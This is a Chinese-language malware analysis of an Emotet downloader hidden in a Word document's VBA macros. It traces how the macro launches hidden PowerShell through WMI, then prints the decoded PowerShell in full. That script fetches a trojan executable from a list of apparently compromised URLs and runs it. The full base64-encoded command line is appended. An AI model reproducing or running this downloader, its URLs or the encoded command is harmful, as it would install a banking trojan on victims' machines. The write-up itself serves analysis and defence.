记一次Emotet木马下载器的分析
Part 1:
简要流程:
1. Sub Document_open()执行代码调用O15ho2roxnv7ybuidx.H4b0154n64u
2.1 H4b0154n64u调用
Fl5n0bbcb9wio()返回值: "winmgmts:win32_Process"
2.2 H4b0154n64u 调用
W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae)
2.3 H4b0154n64u 调用
Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij)
获得// CreateObject "winmgmts:win32_ProcessstartuP"
2.4 H4b0154n64u 调用
W1ux0__6p4lqepk.Create Wlu43k5ugcf, Vf6mjdhloae576t, Nw0s5mi0i4948
2.4.1 Wlu43k5ugcf为函数名,调用Wlu43k5ugcf = Fl5n0bbcb9wio(F2ehdobzqp8u)
取得powershell代码.启动了powershell,vb代码运行完毕
详细分析:
1.Sub Document_open()调用O15ho2roxnv7ybuidx.H4b0154n64u
2. O15ho2roxnv7ybuidx.H4b0154n64函数一共几个功能:
2.1 G0yh3lf7156ae = Fl5n0bbcb9wio(Viwkwysmsx4anz0wt4)
调用Fl5n0bbcb9wio,传入的参数是Viwkwysmsx4anz0wt4(下边第二个图):
/*": ue, s:: ue, s:w: ue, s:i: ue, s:nm: ue, s:: ue, s:gm: ue, s:t: ue, s:: ue, s:s: ue, s:: ue, s::: ue, s:w: ue, s:in: ue, s:: ue, s:3: ue, s:2: ue, s:_: ue, s:P: ue, s:ro: ue, s:: ue, s:ce: ue, s:s: ue, s:s: ue, s:"*/
函数Fl5n0bbcb9wio()功能:
至此函数Fl5n0bbcb9wio()返回值: "winmgmts:win32_Process"
2.2 将返回值: "winmgmts:win32_Process"为参数 创建object,
Set W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae),详细信息如下:
2.3 调用函数W7iyiz8spoc91mo()
Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij) //"winmgmts:win32_ProcessstartuP"
W7iyiz8spoc91mo()函数功能:
Set W7iyiz8spoc91mo = CreateObject(Rcc0m4zmrlen_tlmqb) //"winmgmts:win32_ProcessstartuP"
W7iyiz8spoc91mo. _showwindow = wdKeyEquals - wdKeyEquals
2.4 W1ux0__6p4lqepk.Create Wlu43k5ugcf, Vf6mjdhloae576t, Nw0s5mi0i4948
其中:
W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae) //win32_process
Wlu43k5ugcf是一个函数名,
Vf6mjdhloae576t为空,
Nw0s5mi0i4948为: Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij) //"winmgmts:win32_ProcessstartuP"
2.4.1 函数:Wlu43k5ugcf()功能概览
1 .Set G1myonmyip_ = Uuebqrha3c2.Content
//该模块如图所示:
其content为:
/*": ue, s:: ue, s:w: ue, s:i: ue, s:nm: ue, s:: ue, s:gm: ue, s:t: ue, s:: ue, s:s: ue, s:: ue, s::: ue, s:w: ue, s:in: ue, s:: ue, s:3: ue, s:2: ue, s:_: ue, s:P: ue, s:ro: ue, s:: ue, s:ce: ue, s:s: ue, s:s: ue, s:"*/
2.F2ehdobzqp8u = Right(G1myonmyip_.Text, Len(G1myonmyip_.Text) - 1)
3. Wlu43k5ugcf = Fl5n0bbcb9wio(F2ehdobzqp8u)
Function Fl5n0bbcb9wio(Q2si2nw66sivcs2zr)函数如下:
出现了敏感字符串: POwersheLL -ENCOD ABFAGgAZQBmADUAO……., 和文首的processmonitor截图中出现的powershell启动相同的字符串:
至此Fl5n0bbcb9wio返回的是字符串POwersheLL -ENCOD ABFAGgAZQBmADUAO…….
即Wlu43k5ugcf = Fl5n0bbcb9wio(F2ehdobzqp8u),即Wlu43k5ugcf函数的功能为获得关键字符串POwersheLL -ENCOD JABFAGgAZQBmADUAO…….
回到2.4
W1ux0__6p4lqepk.Create Wlu43k5ugcf, Vf6mjdhloae576t, Nw0s5mi0i4948
其中:
W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae) //win32_process
Wlu43k5ugcf是一个函数名,
Vf6mjdhloae576t为空,
Nw0s5mi0i4948为: Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij) //"winmgmts:win32_ProcessstartuP"
由此得出结论:
运行了powershell代码.往回追溯得出运行过程:
1. Sub Document_open()执行代码调用O15ho2roxnv7ybuidx.H4b0154n64u
2.1 H4b0154n64u调用
Fl5n0bbcb9wio()返回值: "winmgmts:win32_Process"
2.2 H4b0154n64u 调用
W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae)
2.3 H4b0154n64u 调用
Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij)
获得// CreateObject "winmgmts:win32_ProcessstartuP"
2.4 H4b0154n64u 调用
W1ux0__6p4lqepk.Create Wlu43k5ugcf, Vf6mjdhloae576t, Nw0s5mi0i4948
2.4.1 Wlu43k5ugcf为函数名,调用Wlu43k5ugcf = Fl5n0bbcb9wio(F2ehdobzqp8u)
取得powershell代码.启动了powershell, Vf6mjdhloae576t为空, Nw0s5mi0i4948没发现啥作用.
至此运行完毕.powershell代码来源于最终来源于Uuebqrha3c2.Content
下边分析powershell字符串:
Part 2:
Powershell代码解密后如下:
$Ehef59i=(('Z'+'s5')+'0'+('d5'+'b'));
&('ne'+'w'+'-item')
$Env:UserpROfIle\I2byDoI\ejo26QD\-itemtypeDIRECtory;
[Net.ServicePointManager]::"S`e`cUri`TyProtOcol"=(('tl'+'s12')+(',tls'+'1')+('1'+',')+'tl'+'s'); #tls12,tls11,tls
$F3ysqov=(('P'+'_lu')+'l'+('vp'+'1'));
$Mlop803=('F'+('nj'+'kp8o'));
$Dglrx5x=$env:userprofile+(('{0}I2'+'by'+('do'+'i')+'{0}'+('E'+'jo')+'26qd{'+'0'+'}')-f[CHar]92)+$F3ysqov+('.'+('ex'+'e'));
#C:\Users\Administrator\I2bydoi\Ejo26qd\.exe
$Ezwvj1m=(('We'+'7')+'e'+('t'+'ev'));
$Up2imep=&('new-'+'ob'+'ject')Net.wEbCLient;
#创建Net.wEbCLient对象
$Swkc22m=('ht'+'t'+'p'+':'+('/'+'/www.f'+'i')+'r'+('hajs'+'h')+('o'+'es.co'+'m/w')+'p'+'-a'+'d'+'m'+'i'+'n/'+'R'+'g'+'ai'+'T/'+('*h'+'tt')+'p:'+'//'+('fak'+'e')+('r'+'ea')+'d'+('.c'+'o')+('m/'+'O')+('n'+'eSi'+'gn'+'al-W'+'eb-S'+'DK-')+'H'+'T'+'T'+'PS'+('-'+'In')+('tegra'+'ti')+('on-Fil'+'es/')+('Wf/'+'*')+'h'+('t'+'tp:/')+'/'+('w'+'ww.')+'r'+('tt'+'utori')+('ng.c'+'om')+'/'+('w'+'p-i')+('n'+'clud')+('es/'+'Ll')+('bY'+'6o')+('/*h'+'t')+('tp'+'://b')+('lu'+'e')+'s'+'k'+('y'+'sol.')+('co'+'m')+'/s'+'ys'+'-'+('c'+'ach')+('e/'+'2R')+('k'+'/*ht')+('tp:'+'//cr')+('az'+'yboxs.'+'com/')+('cg'+'i')+'-'+'b'+'in'+('/I'+'aJ/'+'*ht')+('t'+'p:')+'//'+('w'+'ww')+('.pa'+'ram'+'e')+'di'+('cale'+'d'+'ucati'+'ongui')+'de'+'l'+('i'+'nes.c')+('o'+'m/')+('w'+'p-')+('ad'+'min')+('/3j'+'XU')+'5B'+('p'+'/*h')+'tt'+('p'+'://')+'n'+'uh'+('at'+'oys.c')+('o'+'m/wp')+'-'+('a'+'dmi')+('n/'+'WW')+('A4R'+'/'))."sPl`IT"([char]42);$Khmx6rc=('Bk'+('7r4'+'j')+'h');
#共有七个下载链接,其中有三个可以下载成功,均为Emotet木马,md5如下:
#http://www.firhajshoes.com/wp-admin/RgaiT/
#可以下载 4c613753d03629fcea945d7ab1289f78
#http://fakeread.com/OneSignal-Web-SDK-HTTPS-Integration-Files/Wf/
#http://www.rttutoring.com/wp-includes/LlbY6o/
#http://blueskysol.com/sys-cache/2Rk/
#http://crazyboxs.com/cgi-bin/IaJ/
#可以下载 04a8af949217a0e53629de69ad9574ef
#http://www.paramedicaleducationguidelines.com/wp-admin/3jXU5Bp/
#可以下载 41dedfcd2321b9ad762f7aadb4d3e190
#http://nuhatoys.com/wp-admin/WWA4R/
foreach($Ygzxknjin$Swkc22m)
{try
{
$Up2imep."DOW`NlO`ADf`iLe"($Ygzxknj,$Dglrx5x);
$Ycf84fz=(('Zg'+'u3')+('d'+'yf')); #Zgu3dyf
If((&('G'+'et-'+'Item')$Dglrx5x)."l`enGtH"-ge21773)
#length>21773,疑似判断是否下载完
{
.('Invo'+'ke-Ite'+'m')($Dglrx5x);
#InvokeItem 对指定的项目执行默认操作,即执行C:\Users\Administrator\I2bydoi\Ejo26qd\.exe
$L7hv3yz=('C'+('t_'+'66pw')); #Ct_66pw
break;
$Uhr0y_j=(('Ox'+'y')+('8k'+'p')+'o') #Oxy8kpo
}
}
catch{}
}
$Uzmn_sg=(('Mk'+'1xz8')+'e') #Mk1xz8e
总结: word文档利用vb代码生成powershell代码并执行, 下载多个银行木马Trojan/Win32.Emotet并运行.
附:
Command line: POwersheLL -ENCOD JABFAGgAZQBmADUAOQBpAD0AKAAoACcAWgAnACsAJwBzADUAJwApACsAJwAwACcAKwAoACcAZAA1ACcAKwAnAGIAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAG4AdgA6AFUAcwBlAHIAcABSAE8AZgBJAGwAZQBcAEkAMgBiAHkARABvAEkAXABlAGoAbwAyADYAUQBEAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQASQBSAEUAQwB0AG8AcgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAGMAVQByAGkAYABUAHkAUAByAG8AdABPAGMAbwBsACIAIAA9ACAAKAAoACcAdABsACcAKwAnAHMAMQAyACcAKQArACgAJwAsACAAdABsAHMAJwArACcAMQAnACkAKwAoACcAMQAnACsAJwAsACAAJwApACsAJwB0AGwAJwArACcAcwAnACkAOwAkAEYAMwB5AHMAcQBvAHYAIAA9ACAAKAAoACcAUAAnACsAJwBfAGwAdQAnACkAKwAnAGwAJwArACgAJwB2AHAAJwArACcAMQAnACkAKQA7ACQATQBsAG8AcAA4ADAAMwA9ACgAJwBGACcAKwAoACcAbgBqACcAKwAnAGsAcAA4AG8AJwApACkAOwAkAEQAZwBsAHIAeAA1AHgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0ASQAyACcAKwAnAGIAeQAnACsAKAAnAGQAbwAnACsAJwBpACcAKQArACcAewAwAH0AJwArACgAJwBFACcAKwAnAGoAbwAnACkAKwAnADIANgBxAGQAewAnACsAJwAwACcAKwAnAH0AJwApACAAIAAtAGYAWwBDAEgAYQByAF0AOQAyACkAKwAkAEYAMwB5AHMAcQBvAHYAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABFAHoAdwB2AGoAMQBtAD0AKAAoACcAVwBlACcAKwAnADcAJwApACsAJwBlACcAKwAoACcAdAAnACsAJwBlAHYAJwApACkAOwAkAFUAcAAyAGkAbQBlAHAAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBFAGIAQwBMAGkAZQBuAHQAOwAkAFMAdwBrAGMAMgAyAG0APQAoACcAaAB0ACcAKwAnAHQAJwArACcAcAAnACsAJwA6ACcAKwAoACcALwAnACsAJwAvAHcAdwB3AC4AZgAnACsAJwBpACcAKQArACcAcgAnACsAKAAnAGgAYQBqAHMAJwArACcAaAAnACkAKwAoACcAbwAnACsAJwBlAHMALgBjAG8AJwArACcAbQAvAHcAJwApACsAJwBwACcAKwAnAC0AYQAnACsAJwBkACcAKwAnAG0AJwArACcAaQAnACsAJwBuAC8AJwArACcAUgAnACsAJwBnACcAKwAnAGEAaQAnACsAJwBUAC8AJwArACgAJwAqAGgAJwArACcAdAB0ACcAKQArACcAcAA6ACcAKwAnAC8ALwAnACsAKAAnAGYAYQBrACcAKwAnAGUAJwApACsAKAAnAHIAJwArACcAZQBhACcAKQArACcAZAAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACgAJwBtAC8AJwArACcATwAnACkAKwAoACcAbgAnACsAJwBlAFMAaQAnACsAJwBnAG4AJwArACcAYQBsAC0AVwAnACsAJwBlAGIALQBTACcAKwAnAEQASwAtACcAKQArACcASAAnACsAJwBUACcAKwAnAFQAJwArACcAUABTACcAKwAoACcALQAnACsAJwBJAG4AJwApACsAKAAnAHQAZQBnAHIAYQAnACsAJwB0AGkAJwApACsAKAAnAG8AbgAtAEYAaQBsACcAKwAnAGUAcwAvACcAKQArACgAJwBXAGYALwAnACsAJwAqACcAKQArACcAaAAnACsAKAAnAHQAJwArACcAdABwADoALwAnACkAKwAnAC8AJwArACgAJwB3ACcAKwAnAHcAdwAuACcAKQArACcAcgAnACsAKAAnAHQAdAAnACsAJwB1AHQAbwByAGkAJwApACsAKAAnAG4AZwAuAGMAJwArACcAbwBtACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGkAJwApACsAKAAnAG4AJwArACcAYwBsAHUAZAAnACkAKwAoACcAZQBzAC8AJwArACcATABsACcAKQArACgAJwBiAFkAJwArACcANgBvACcAKQArACgAJwAvACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAJwArACcAOgAvAC8AYgAnACkAKwAoACcAbAB1ACcAKwAnAGUAJwApACsAJwBzACcAKwAnAGsAJwArACgAJwB5ACcAKwAnAHMAbwBsAC4AJwApACsAKAAnAGMAbwAnACsAJwBtACcAKQArACcALwBzACcAKwAnAHkAcwAnACsAJwAtACcAKwAoACcAYwAnACsAJwBhAGMAaAAnACkAKwAoACcAZQAvACcAKwAnADIAUgAnACkAKwAoACcAawAnACsAJwAvACoAaAB0ACcAKQArACgAJwB0AHAAOgAnACsAJwAvAC8AYwByACcAKQArACgAJwBhAHoAJwArACcAeQBiAG8AeABzAC4AJwArACcAYwBvAG0ALwAnACkAKwAoACcAYwBnACcAKwAnAGkAJwApACsAJwAtACcAKwAnAGIAJwArACcAaQBuACcAKwAoACcALwBJACcAKwAnAGEASgAvACcAKwAnACoAaAB0ACcAKQArACgAJwB0ACcAKwAnAHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAHcAJwArACcAdwB3ACcAKQArACgAJwAuAHAAYQAnACsAJwByAGEAbQAnACsAJwBlACcAKQArACcAZABpACcAKwAoACcAYwBhAGwAZQAnACsAJwBkACcAKwAnAHUAYwBhAHQAaQAnACsAJwBvAG4AZwB1AGkAJwApACsAJwBkAGUAJwArACcAbAAnACsAKAAnAGkAJwArACcAbgBlAHMALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACkAKwAoACcAdwAnACsAJwBwAC0AJwApACsAKAAnAGEAZAAnACsAJwBtAGkAbgAnACkAKwAoACcALwAzAGoAJwArACcAWABVACcAKQArACcANQBCACcAKwAoACcAcAAnACsAJwAvACoAaAAnACkAKwAnAHQAdAAnACsAKAAnAHAAJwArACcAOgAvAC8AJwApACsAJwBuACcAKwAnAHUAaAAnACsAKAAnAGEAdAAnACsAJwBvAHkAcwAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAcAAnACkAKwAnAC0AJwArACgAJwBhACcAKwAnAGQAbQBpACcAKQArACgAJwBuAC8AJwArACcAVwBXACcAKQArACgAJwBBADQAUgAnACsAJwAvACcAKQApAC4AIgBzAFAAbABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEsAaABtAHgANgByAGMAPQAoACcAQgBrACcAKwAoACcANwByADQAJwArACcAagAnACkAKwAnAGgAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAWQBnAHoAeABrAG4AagAgAGkAbgAgACQAUwB3AGsAYwAyADIAbQApAHsAdAByAHkAewAkAFUAcAAyAGkAbQBlAHAALgAiAEQATwBXAGAATgBsAE8AYABBAEQAZgBgAGkATABlACIAKAAkAFkAZwB6AHgAawBuAGoALAAgACQARABnAGwAcgB4ADUAeAApADsAJABZAGMAZgA4ADQAZgB6AD0AKAAoACcAWgBnACcAKwAnAHUAMwAnACkAKwAoACcAZAAnACsAJwB5AGYAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQARABnAGwAcgB4ADUAeAApAC4AIgBsAGAAZQBuAEcAdABIACIAIAAtAGcAZQAgADIAMQA3ADcAMwApACAAewAuACgAJwBJAG4AdgBvACcAKwAnAGsAZQAtAEkAdABlACcAKwAnAG0AJwApACgAJABEAGcAbAByAHgANQB4ACkAOwAkAEwANwBoAHYAMwB5AHoAPQAoACcAQwAnACsAKAAnAHQAXwAnACsAJwA2ADYAcAB3ACcAKQApADsAYgByAGUAYQBrADsAJABVAGgAcgAwAHkAXwBqAD0AKAAoACcATwB4ACcAKwAnAHkAJwApACsAKAAnADgAawAnACsAJwBwACcAKQArACcAbwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAegBtAG4AXwBzAGcAPQAoACgAJwBNAGsAJwArACcAMQB4AHoAOAAnACkAKwAnAGUAJwApAA==